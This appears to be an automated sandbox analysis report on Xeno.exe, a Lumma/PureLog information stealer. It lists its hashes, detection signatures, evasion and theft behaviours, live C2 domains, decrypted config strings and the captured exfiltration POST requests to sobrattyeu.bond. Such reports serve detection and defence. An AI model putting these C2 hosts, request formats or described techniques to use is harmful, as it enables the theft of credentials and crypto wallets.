
Windows Analysis Report
Xeno.exe

Overview

General Information

Sample name: Xeno.exe
Analysis ID: 1591988
MD5: 1e5f4ee4303aa49c9c32e89132c7b4f9
SHA1: 47a80fa40216ef35cb66dbbf45ffda5eabc803cb
SHA256: ae0ad87b9d4cb0599d08afc3890f98d62c7cf02405ed8aab3d5238814d90febb
Tags: exe, LummaStealer, user-aachum

Detection

LummaC, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected PureLog Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign process
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to modify clipboard data
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Xeno.exe (PID: 5544 cmdline: "C:\Users\user\Desktop\Xeno.exe" MD5: 1E5F4EE4303AA49C9C32E89132C7B4F9)
    • Xeno.exe (PID: 3020 cmdline: "C:\Users\user\Desktop\Xeno.exe" MD5: 1E5F4EE4303AA49C9C32E89132C7B4F9)
    • WerFault.exe (PID: 1740 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 924 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["immolatechallen.bond", "jarry-fixxer.bond", "stripedre-lot.bond", "jarry-deatile.bond", "crookedfoshe.bond", "strivehelpeu.bond", "growthselec.bond", "pain-temper.bond", "sobrattyeu.bond"], "Build id": "yau6Na--914510980"}
Source | Rule | Description | Author
Xeno.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000000.00000000.1685351915.0000000000B92000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
Process Memory Space: Xeno.exe PID: 3020 | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
0.0.Xeno.exe.b90000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.Xeno.exe.3f99550.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.Xeno.exe.3f99550.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-15T16:16:08.174345+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.21.96.1 | 443 | TCP
2025-01-15T16:16:09.762669+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.96.1 | 443 | TCP
2025-01-15T16:16:11.165133+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 104.21.96.1 | 443 | TCP
2025-01-15T16:16:24.157230+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 104.21.96.1 | 443 | TCP
2025-01-15T16:16:25.542673+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49747 | 104.21.96.1 | 443 | TCP
2025-01-15T16:16:26.775321+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 104.21.96.1 | 443 | TCP
2025-01-15T16:16:28.553985+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49749 | 104.21.96.1 | 443 | TCP
2025-01-15T16:16:34.346120+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49750 | 104.21.96.1 | 443 | TCP
2025-01-15T16:16:08.699297+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.96.1 | 443 | TCP
2025-01-15T16:16:10.264589+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 104.21.96.1 | 443 | TCP
2025-01-15T16:16:34.853352+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 104.21.96.1 | 443 | TCP
2025-01-15T16:16:08.699297+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.96.1 | 443 | TCP
2025-01-15T16:16:10.264589+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 104.21.96.1 | 443 | TCP
2025-01-15T16:16:27.517223+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49748 | 104.21.96.1 | 443 | TCP


AV Detection

Source: 0.2.Xeno.exe.3f99550.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["immolatechallen.bond", "jarry-fixxer.bond", "stripedre-lot.bond", "jarry-deatile.bond", "crookedfoshe.bond", "strivehelpeu.bond", "growthselec.bond", "pain-temper.bond", "sobrattyeu.bond"], "Build id": "yau6Na--914510980"}
Source: Xeno.exe | Virustotal: Detection: 47%
Source: Xeno.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.6% probability
Source: Xeno.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String decryptor: jarry-fixxer.bond
Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String decryptor: pain-temper.bond
Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String decryptor: jarry-deatile.bond
Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String decryptor: growthselec.bond
Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String decryptor: stripedre-lot.bond
Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String decryptor: immolatechallen.bond
Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String decryptor: crookedfoshe.bond
Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String decryptor: strivehelpeu.bond
Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String decryptor: sobrattyeu.bond
Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | String decryptor: yau6Na--914510980
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 1_2_00414B68 CryptUnprotectData | 1_2_00414B68
Source: Xeno.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: Xeno.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Windows.Forms.pdb source: WERD33A.tmp.dmp.4.dr
Source: Binary string: mscorlib.pdb source: WERD33A.tmp.dmp.4.dr
Source: Binary string: System.ni.pdbRSDS source: WERD33A.tmp.dmp.4.dr
Source: Binary string: Manjohn.pdbt-^q source: WERD33A.tmp.dmp.4.dr
Source: Binary string: System.pdbh source: WERD33A.tmp.dmp.4.dr
Source: Binary string: mscorlib.ni.pdb source: WERD33A.tmp.dmp.4.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WERD33A.tmp.dmp.4.dr
Source: Binary string: Manjohn.pdb source: Xeno.exe, WERD33A.tmp.dmp.4.dr
Source: Binary string: System.ni.pdb source: WERD33A.tmp.dmp.4.dr
Source: Binary string: System.pdb source: WERD33A.tmp.dmp.4.dr
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-1174A60Fh] | 1_2_00427090
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov esi, dword ptr [0044979Ch] | 1_2_0040D190
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov byte ptr [esi], cl | 1_2_0042D19A
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 1_2_00440AB0
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 27BE92A4h | 1_2_00440AB0
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov eax, edx | 1_2_0040D363
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-02D04E4Dh] | 1_2_00440B90
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh | 1_2_00441450
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 53585096h | 1_2_0042806B
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov ebp, edx | 1_2_00428811
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov word ptr [eax], cx | 1_2_00428811
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov word ptr [eax], cx | 1_2_004208E0
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov ch, dl | 1_2_00408080
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 1_2_0042C080
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov esi, edx | 1_2_00425099
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov word ptr [edi], cx | 1_2_00425099
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov byte ptr [esi], cl | 1_2_0042D944
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov byte ptr [esi], cl | 1_2_0042D955
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov dword ptr [esp+08h], edx | 1_2_00415901
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-68h] | 1_2_00415901
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h | 1_2_00415901
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov byte ptr [esi], cl | 1_2_0042D91A
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ecx+36h] | 1_2_0040C12D
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov word ptr [eax], cx | 1_2_004291C3
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h | 1_2_00429986
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ebp+06h] | 1_2_0041A9E5
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+509ACCB5h] | 1_2_00440190
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 1_2_0042A9B0
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then add eax, ecx | 1_2_0042EA70
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+509ACCB5h] | 1_2_00440270
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx edi, byte ptr [ecx+esi] | 1_2_00402AE0
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 1_2_004072F0
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 1_2_004072F0
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+198CD995h] | 1_2_00418281
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+198CD995h] | 1_2_00418376
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+761380B1h] | 1_2_004273C0
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+35h] | 1_2_004273E0
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 1_2_00437380
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+34h] | 1_2_0040BC4E
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov edx, ebx | 1_2_0043AC10
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov edi, eax | 1_2_00427CE5
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov word ptr [ecx], si | 1_2_0041B571
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movsx eax, byte ptr [esi+ecx] | 1_2_0041DD70
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+2BA72EFAh] | 1_2_00424513
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+34h] | 1_2_00429D10
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov byte ptr [edx], al | 1_2_00419E2F
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+edx-0Ch] | 1_2_0040BD36
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov word ptr [ecx], si | 1_2_0041B588
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov word ptr [ebx], cx | 1_2_0041A591
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-5365E318h] | 1_2_00420DA0
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx ecx, byte ptr [esi+eax+48643817h] | 1_2_0043EDA6
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+509ACCB5h] | 1_2_0043FE40
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx esi, byte ptr [ecx] | 1_2_0040A610
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h | 1_2_0043D630
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx+736218E3h] | 1_2_004406D0
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+509ACCB5h] | 1_2_004406D0
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov byte ptr [edi], al | 1_2_0042E6F5
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 6F32DC84h | 1_2_0043D6A0
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+509ACCB5h] | 1_2_0043FF50
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+509ACCB5h] | 1_2_0043FF70
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h | 1_2_00418700
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h | 1_2_00418700
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov byte ptr [edi], al | 1_2_0042E6F3
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov byte ptr [edi], cl | 1_2_0042DFC3
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then mov byte ptr [esi], cl | 1_2_0042D7C0
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then test esi, esi | 1_2_0043AFD0
Source: C:\Users\user\Desktop\Xeno.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-72CEDD06h] | 1_2_004197F0

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49733 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49748 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 104.21.96.1:443
Source: Malware configuration extractor | URLs: immolatechallen.bond
Source: Malware configuration extractor | URLs: jarry-fixxer.bond
Source: Malware configuration extractor | URLs: stripedre-lot.bond
Source: Malware configuration extractor | URLs: jarry-deatile.bond
Source: Malware configuration extractor | URLs: crookedfoshe.bond
Source: Malware configuration extractor | URLs: strivehelpeu.bond
Source: Malware configuration extractor | URLs: growthselec.bond
Source: Malware configuration extractor | URLs: pain-temper.bond
Source: Malware configuration extractor | URLs: sobrattyeu.bond
Source: Joe Sandbox View | IP Address: 104.21.96.1
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.96.1:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: sobrattyeu.bond
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 51 | Host: sobrattyeu.bond
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=0C84Y36Y3O | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18119 | Host: sobrattyeu.bond
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=XVKS6T05H4JF1683U6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8788 | Host: sobrattyeu.bond
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=WLMONHV8TN | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20393 | Host: sobrattyeu.bond
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=WWDJ5BXJR9T6I9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1391 | Host: sobrattyeu.bond
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=RFRJMFWTEQN7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 568321 | Host: sobrattyeu.bond
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 86 | Host: sobrattyeu.bond
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: sobrattyeu.bond
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: sobrattyeu.bond
                      Source: Xeno.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: Xeno.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                      Source: Xeno.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                      Source: Xeno.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: Xeno.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: Xeno.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: Xeno.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                      Source: Xeno.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: Xeno.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: Xeno.exe | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                      Source: Xeno.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                      Source: Xeno.exe | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                      Source: Xeno.exe | String found in binary or memory: http://ocsp.digicert.com0A
                      Source: Xeno.exe | String found in binary or memory: http://ocsp.digicert.com0C
                      Source: Xeno.exe | String found in binary or memory: http://ocsp.digicert.com0H
                      Source: Xeno.exe | String found in binary or memory: http://ocsp.digicert.com0I
                      Source: Xeno.exe | String found in binary or memory: http://ocsp.digicert.com0X
                      Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net
                      Source: Xeno.exe | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                      Source: Xeno.exe, 00000001.00000002.2943363662.000000000356D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://sobrattyeu.bond/
                      Source: Xeno.exe, 00000001.00000002.2943363662.000000000356D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://sobrattyeu.bond/C
                      Source: Xeno.exe, 00000001.00000002.2942920179.0000000000D22000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sobrattyeu.bond/TEQN7c
                      Source: Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp, Xeno.exe, 00000001.00000002.2942776722.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sobrattyeu.bond/api
                      Source: Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sobrattyeu.bond/api7
                      Source: Xeno.exe | String found in binary or memory: https://www.digicert.com/CPS0
                      Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49737 version: TLS 1.2
